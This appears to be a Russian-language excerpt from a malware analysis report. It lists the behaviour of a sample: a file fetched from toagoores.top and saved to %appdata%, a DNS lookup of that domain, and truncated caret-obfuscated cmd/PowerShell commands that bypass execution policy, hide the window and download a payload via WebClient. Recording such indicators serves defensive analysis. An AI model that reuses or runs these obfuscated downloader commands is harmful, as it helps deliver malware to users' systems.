Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^WErSH^eLL.^E^XE -EXE^Cu^T^I^oNpoliCY b^ypAs^S -^no^p^Ro^fILe^ ^-W^i^nDOWsTYle ^HiDdE^n^ (^nEW-ob^JE^C^T S^YSt^em.n^eT.WEbcLiEnt).D^Ow^N^l^O^a^DFILE('http://toagoores.top/rea...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "p^O^WErSH^eLL.^E^XE -EXE^Cu^T^I^oNpoliCY b^ypAs^S -^no^p^Ro^fILe^ ^-W^i^nDOWsTYle ^HiDdE^n^ (^nEW-ob^JE^C^T S^YSt^em.n^eT.WEbcLiEnt).D^Ow^N^l^O^a^DFILE('http://toagoores.top/rea...' (со скрытым окном)